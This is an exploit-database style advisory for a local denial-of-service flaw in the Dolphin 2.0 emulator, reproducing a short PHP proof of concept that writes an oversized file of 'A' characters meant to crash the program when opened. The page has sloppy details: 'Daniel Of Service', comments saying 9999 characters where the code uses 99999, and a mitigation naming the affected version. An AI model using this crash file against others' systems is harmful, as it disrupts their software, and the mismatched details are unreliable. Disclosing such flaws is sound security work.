Dolphin 2.0 (.elf) Local Daniel Of Service

vendor:

Dolphin

by:

Pr0T3cT10n

8,8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Dolphin

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:dolphin_emu:dolphin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

Dolphin 2.0 (.elf) Local Daniel Of Service

Dolphin 2.0 is vulnerable to local denial of service attack. When we try to open a file by 'Open(CTRL+O)' that contains 9999 chars ('A'), so dolphin should crash.

Mitigation:

Update to the latest version of Dolphin 2.0

Source

Exploit-DB raw data:

<?php
# Dolphin 2.0 (.elf) Local Daniel Of Service
# Software Site: http://www.dolphin-emu.com/
# Software Download: http://www.dolphin-emu.com/downloads.php?cat_id=9&download_id=94
# Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
# Site: http://www.nullbyte.org.il
##################################################################
# Dolphin 2.0 is vulnerable to local denial of service attack.
# When we try to open a file by 'Open(CTRL+O)'
# that contains 9999 chars ('A'), so dolphin should crash.
##################################################################
# PoC / Code:
$buffer = str_repeat('A', 99999); # Create 9999 chars('A')..
if(file_put_contents('crash.elf', $buffer)) {
 echo("File created successfuly.\r\nDolphin should crash when you open the file with it.\r\n");
} else {
 echo("Can't create file. Try again.\r\n");
}
# Cya :)
# NULLBYTE.ORG.IL
####################
?>